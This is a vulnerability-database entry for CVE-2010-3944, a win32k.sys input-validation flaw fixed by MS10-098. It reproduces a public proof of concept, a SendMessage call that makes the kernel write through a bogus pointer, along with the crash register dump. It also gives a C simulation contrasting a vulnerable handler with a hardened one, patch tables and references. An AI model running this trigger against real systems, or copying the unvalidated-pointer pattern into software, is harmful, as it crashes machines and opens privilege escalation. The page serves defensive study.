CVE-2010-3944
Description
win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability."
Mitigations
No community mitigations published for this CVE yet. The vendor fix is the MS10-098 security update (Microsoft bulletin linked under References); the proof-of-concept below was released against that bulletin.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)
/*************************************************************************************
* MS10-098
* CVE-2010-3944
*
* Microsoft Windows Win32k pointer dereference
*
* --------------------
* Affected Software
* --------------------
* Microsoft Windows 7 / 2008
*
*
* --------------------
* Consequences
* --------------------
* An unprivileged user may be able to cause a bugcheck, or possibly execute
* arbitrary code via CSRSS.EXE.
*
*
*
* Credits : Stefan LE BERRE (s.leberre@sysdream.com)
* Ludo t0ka7a
*
* WebSites : http://www.sysdream.com/
* http://ghostsinthestack.org/
* http://infond.blogspot.com/
* http://twitter.com/hackinparis
*
* kd> r
* eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618 edi=fea00618
* eip=8d72af90 esp=95b54a98 ebp=95b54b00 iopl=0 nv up ei ng nz na pe nc
* cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286
* win32k!xxxRealDefWindowProc+0xf6:
* 8d72af90 c60000 mov byte ptr [eax],0 ds:0023:00013370=??
*
*************************************************************************************/
#include <stdio.h>
#include <windows.h>
#include <Winuser.h>

int main(int argc, char *argv[])
{
    /* Message 13 is WM_GETTEXT: wParam is cchTextMax, lParam is the output buffer.
     * Handle 16 is the authors' handle for the #32769 (desktop) window on their system.
     * 0x00013370 is the bogus buffer pointer that win32k dereferences, as shown by
     * "mov byte ptr [eax],0" with eax=00013370 in the kd> output above. */
    SendMessage((HWND) 16, (UINT) 13, 0x80000000, 0x00013370); // 0x13370 is the deref and 16 is the window handle of #32769
    return 0;
}
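The kd> output in the header shows win32k's default window procedure storing a NUL byte through the caller's lParam (eax = 0x13370) with no check that the address is writable: the message parameters crossed from user mode into the kernel and were used as a pointer unvalidated. As an added example, not part of the Exploit-DB entry and not win32k code, the following portable C program simulates that WM_GETTEXT handler twice, once trusting lParam as the vulnerable code did and once probing the whole declared buffer range before writing. The 64 KiB "user space" arena, the function names, the status codes and the window text "Desktop" are this example's own assumptions; WM_GETTEXT = 13 is the real message number the PoC sends.

```c
/*
 * Added example (not the PoC authors' code and not win32k's): a portable,
 * user-mode simulation of the bug class behind CVE-2010-3944. A "kernel"
 * WM_GETTEXT handler receives the caller's wParam (cchTextMax) and lParam
 * (buffer pointer) and must copy the window text and NUL-terminate it.
 * The vulnerable variant trusts lParam; the hardened variant validates the
 * whole [lParam, lParam + cchTextMax) range before touching memory, which is
 * what a kernel probe of a user buffer must do.
 *
 * Assumptions (all hypothetical): user space is a 64 KiB arena and an
 * "address" is an offset into it; a fault is reported as a status code
 * instead of a bugcheck; status values are this example's own.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define WM_GETTEXT 0x000Du          /* the real Win32 message number the PoC sends */
#define USER_SPACE_SIZE 0x10000u    /* simulated user address space (hypothetical) */

static unsigned char g_user_space[USER_SPACE_SIZE];
static const char WINDOW_TEXT[] = "Desktop";   /* constructed window text */

enum {
    STATUS_OK = 0,
    STATUS_NOT_SUPPORTED = 1,
    STATUS_INVALID_PARAMETER = 2,   /* hardened handler refused the buffer */
    STATUS_ACCESS_VIOLATION = 3     /* stands in for the bugcheck in the kd> output */
};

/* Read back what a handler left in the simulated user space. */
const char *user_text_at(uintptr_t addr)
{
    return (const char *)&g_user_space[addr];
}

/* Number of characters that fit before the NUL terminator (cchTextMax >= 1). */
static size_t chars_to_copy(uintptr_t cchTextMax)
{
    size_t n = strlen(WINDOW_TEXT);
    if (n > cchTextMax - 1)
        n = cchTextMax - 1;
    return n;
}

/* Vulnerable: the only "check" is the cchTextMax truncation; the pointer
 * itself is never validated, so a bogus lParam is dereferenced. */
int getText_vulnerable(unsigned msg, uintptr_t cchTextMax, uintptr_t lParam)
{
    if (msg != WM_GETTEXT)
        return STATUS_NOT_SUPPORTED;
    if (cchTextMax == 0)
        return STATUS_OK;
    size_t n = chars_to_copy(cchTextMax);
    /* A real kernel would write here unconditionally; the fault is detected
     * instead so this program survives rather than crashing like the kd> session. */
    if (lParam + n >= USER_SPACE_SIZE)
        return STATUS_ACCESS_VIOLATION;
    memcpy(&g_user_space[lParam], WINDOW_TEXT, n);
    g_user_space[lParam + n] = 0;   /* the "mov byte ptr [eax],0" from the kd> output */
    return STATUS_OK;
}

/* Hardened: probe the entire caller-declared range, with no wrap-around,
 * before any write. The PoC's (cchTextMax, lParam) pair is rejected here. */
int getText_hardened(unsigned msg, uintptr_t cchTextMax, uintptr_t lParam)
{
    if (msg != WM_GETTEXT)
        return STATUS_NOT_SUPPORTED;
    if (cchTextMax == 0)
        return STATUS_OK;
    if (cchTextMax > USER_SPACE_SIZE || lParam > USER_SPACE_SIZE - cchTextMax)
        return STATUS_INVALID_PARAMETER;
    size_t n = chars_to_copy(cchTextMax);
    memcpy(&g_user_space[lParam], WINDOW_TEXT, n);
    g_user_space[lParam + n] = 0;
    return STATUS_OK;
}

int main(void)
{
    /* The PoC's arguments: SendMessage(hwnd, 13, 0x80000000, 0x00013370). */
    printf("vulnerable, PoC args: status %d\n",
           getText_vulnerable(WM_GETTEXT, 0x80000000u, 0x00013370u));
    printf("hardened,   PoC args: status %d\n",
           getText_hardened(WM_GETTEXT, 0x80000000u, 0x00013370u));
    /* A legitimate caller: 64-char buffer at user address 0x100. */
    printf("hardened,   valid:    status %d, text \"%s\"\n",
           getText_hardened(WM_GETTEXT, 64u, 0x100u), user_text_at(0x100u));
    return 0;
}
```

The point of the hardened check is the order of operations: the range test covers the full cchTextMax the caller declared (so the PoC's 0x80000000 fails even with a valid base address) and rejects wrap-around before a single byte is written. On a real kernel the equivalent is probing the user buffer and catching the access fault around the copy, rather than writing the terminator first and validating afterwards.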
OS impact
Windows: 2 affected releases
| Version | Status | Fixed in |
|---|---|---|
| Windows Server 2008 R2 | Affected | MS10-098 security update |
| Windows 7 | Affected | MS10-098 security update |
References
- http://www.securitytracker.com/id?1024880
- http://www.us-cert.gov/cas/techalerts/TA10-348A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-098
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12184
CWEs
CWE-20: Improper Input Validation